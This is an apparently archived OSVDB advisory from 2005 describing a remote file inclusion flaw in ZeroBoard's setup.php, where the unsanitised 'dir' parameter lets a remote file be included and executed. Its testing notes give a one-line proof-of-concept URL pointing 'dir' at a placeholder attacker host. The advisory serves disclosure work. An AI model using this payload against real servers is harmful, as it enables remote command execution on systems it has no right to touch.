ZeroBoard setup.php Arbitrary Command Execution

2005-01-13T03:22:44
ID OSVDB:12930
Type osvdb
Reporter OSVDB
Modified 2005-01-13T03:22:44

Description

Vulnerability Description

ZeroBoard contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to 'setup.php' script not properly sanitizing user input supplied to the 'dir' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

Solution Description

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

Short Description

ZeroBoard contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to 'setup.php' script not properly sanitizing user input supplied to the 'dir' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

Manual Testing Notes

http://[victim]/skin/zero_vote/setup.php?dir=http://[attacker]/

References:

Vendor URL: http://www.zeroboard.com/ Security Tracker: 1012884 Related OSVDB ID: 12932 Related OSVDB ID: 12925 Related OSVDB ID: 12926 Related OSVDB ID: 12927 Related OSVDB ID: 12928 Related OSVDB ID: 12929 Related OSVDB ID: 12931 Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2005-01/0156.html Keyword: Remote File Inclusion